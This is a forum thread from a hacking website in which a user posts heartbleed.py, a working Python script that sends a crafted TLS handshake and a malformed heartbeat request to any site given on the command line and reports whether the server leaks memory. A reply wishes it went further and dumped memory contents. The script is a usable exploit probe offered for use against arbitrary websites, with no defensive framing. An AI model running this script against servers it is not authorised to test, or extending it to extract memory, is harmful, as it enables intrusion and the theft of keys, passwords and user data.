Monday, July 28, 2014 Login · Register
    Login
Username

Password


Remember Me

Not a member yet?
Click here to register.

Forgotten your password?
Request a new one here.

 

    Users Online
  • · Members on IRC: 32   
  • · Total Members: 15,655
  • · Newest Member: HAV0C
  •  

     

        Related Ads
     

     

     

        Top 10 Forum Posters
    UserPosts
    bluechill1411   
    madf0x1285   
    cruizrisner1061   
    Qwexotic1034   
    Null Set870   
    Override604   
    auditorsec603   
    godofcereal599   
    TurboBorland585   
    Teddy477   
     

        Affiliates




  • iExploit


  • iExploit


  • WeChall





  • Thisislegal.com

  •  

        Related Ads
     

    View Thread
         
    Security Override Hacking Website Hacking
    heartbleed.py
    Register FAQ Members List Today's Posts Search

    Print Thread
    04-13-2014 03:08 PM heartbleed.py
    Download source  Code
    #!/usr/bin/python2

    import sys
    import select
    import socket
    import struct

    port = 443

    TLS_ALERT        = 21
    TLS_HANDSHAKE    = 22
    TLS_HEARTBEAT    = 24
    TLS_SERVER_HELLO = 2
    TLS_SERVER_DONE  = 14

    hello = '160301009a0100009603015344d92abb92c20fbd4ea45804ec9772113085beaf355a0bd45cf30f6c563862000024c02bc02f009e009cc00ac01400390035c007c009c011c0130033003200050004002f000a0100000049000b000403000102000a00340032000e000d0019000b000c00180009000a00160017000800060007001400150004000500120013000100020003000f0010001100230000000f000101'.decode('hex')

    heartbeat = '180301000301f000'.decode('hex')

    def recvheader(s):
        header = recvall(s, 5)
        if header == None:
            return None, None, None
        return struct.unpack('>BHH', header)

    def recvall(s, length):
        data = ''
        left = length
        while left > 0:
            ready = select.select([s], [], [], 5)
            if ready[0]:
                res = s.recv(left)
                left -= len(res)
                data += res
            else:
                return None

        return data

    def recvrecord(s):
        typ, ver, length = recvheader(s)
        if typ == None:
            return None, None, None
        data = recvall(s, length)
        if data == None:
            return None, None, None
        return typ, length, data


    def main():
        host = ''
        if len(sys.argv) > 1:
            host = sys.argv[1]
        else:
            print "usage: python " + sys.argv[0] + " website"
            return

        print "Connecting to " + host
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))

        print "Sending ClientHello"
        s.send(hello)

        typ, length, data = recvrecord(s)
        if typ == None:
            print "No response to ClientHello"
            return

        if typ == TLS_HANDSHAKE and ord(data[0]) == TLS_SERVER_HELLO:
            print "Got server hello"

            while True:
                typ, length, data = recvrecord(s)
                if typ == None:
                    print "Connection closed"
                    return
                print typ, length

                if typ == TLS_HANDSHAKE and ord(data[0]) == TLS_SERVER_DONE:
                    print "Received server handshake done"
                    break

            print "Sending heartbeat"
            s.send(heartbeat);
            while True:
                typ, length, data = recvrecord(s)
                if typ == None:
                    print "No response to heartbeat, website not vulnerable"
                    break
                elif typ == TLS_ALERT:
                    print "Received TLS_ALERT, Website not vulnerable"
                    break
                elif typ == TLS_HEARTBEAT:
                    if len(data) > 3:
                        print "Website is vulnerable"
                    else:
                        print "Received heartbeat response, but not extra data. Website not vulnerable"
                    break
        else:
            print "Didn't get server hello"

    main()



     
    Offline
    04-13-2014 04:01 PM RE: heartbleed.py
    pretty neat. Kinda sad it doesnt go the full mile and start dumping mem contents. but nice job anyways.
    dmr, September 9, 1941 October 9, 2011

    Never Forget
     
    Offline
    Jump to Forum:
    Forum powered by fusionBoard